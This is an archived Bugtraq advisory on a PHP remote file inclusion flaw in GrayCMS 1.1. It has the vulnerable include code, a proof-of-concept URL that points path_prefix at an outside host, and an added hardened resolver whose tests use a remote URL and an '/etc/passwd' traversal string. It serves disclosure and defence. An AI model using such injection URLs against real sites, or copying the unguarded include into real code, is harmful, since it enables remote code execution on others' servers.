Bugtraq mailing list archives

GrayCMS php code injection
From: Kold <maggik () gala net>
Date: 26 Apr 2005 11:45:32 -0000



Version:  1.1
Severity: High
Vendor:   http://gcms.graymur.net/

Vulnerable code is in "code/error.php":

<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
  require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {

...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}

require $path_prefix.'code/blocks.php';
exit;
<----end---->


PoC: 
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
 
mail me:    maggik <at> gala <dot> net
icq:        3316667
greetz to:  ghc, 0xdeadbabe, unl0ck & others
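
A hardened form of the include pattern shown in the advisory, as an added example that is not part of the original post or of GrayCMS: the include root is a server-side constant, and every path is resolved and checked against that root before `require`. It assumes `$path_prefix` reaches the script from the request (for example through `register_globals`); `GCMS_ROOT`, `safe_include_path()` and the temp-directory layout are hypothetical.

```php
<?php
// Added example, not GrayCMS code. GCMS_ROOT and safe_include_path() are
// hypothetical names; the temp directory tree is constructed sample data.
declare(strict_types=1);

// Resolve $relative under $baseDir. Throws if the target does not exist or
// resolves outside the base directory (URLs, ../ sequences, symlinks out).
function safe_include_path(string $baseDir, string $relative): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    // Prefixing with $base turns a URL into a non-existent local path, so
    // realpath() fails; ../ sequences are collapsed before the prefix check.
    $full = realpath($base . DIRECTORY_SEPARATOR . $relative);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($full === false || strncmp($full, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('include outside application root rejected');
    }
    return $full;
}

// Constructed layout standing in for the application tree.
$root = sys_get_temp_dir() . '/gcms_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/code', 0700, true);
file_put_contents($root . '/code/blocks.php', "<?php echo \"blocks loaded\\n\";");

// The prefix is a server-side constant; no request variable can replace it.
define('GCMS_ROOT', $root);

// Same parameter name as the advisory's request, with a constructed value.
$_GET['path_prefix'] = 'http://example.invalid/';

require safe_include_path(GCMS_ROOT, 'code/blocks.php');

// If request data ever reached the resolver, it would still be refused.
foreach ([$_GET['path_prefix'] . 'code/blocks.php', '../../etc/passwd'] as $bad) {
    try {
        safe_include_path(GCMS_ROOT, $bad);
        echo "accepted (unexpected): $bad\n";
    } catch (RuntimeException $e) {
        echo "rejected: $bad\n";
    }
}
```

Independently of the code change, `register_globals = Off` and `allow_url_include = Off` (or `allow_url_fopen = Off` on PHP versions that predate it) in php.ini remove the conditions a request like the one above typically depends on.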

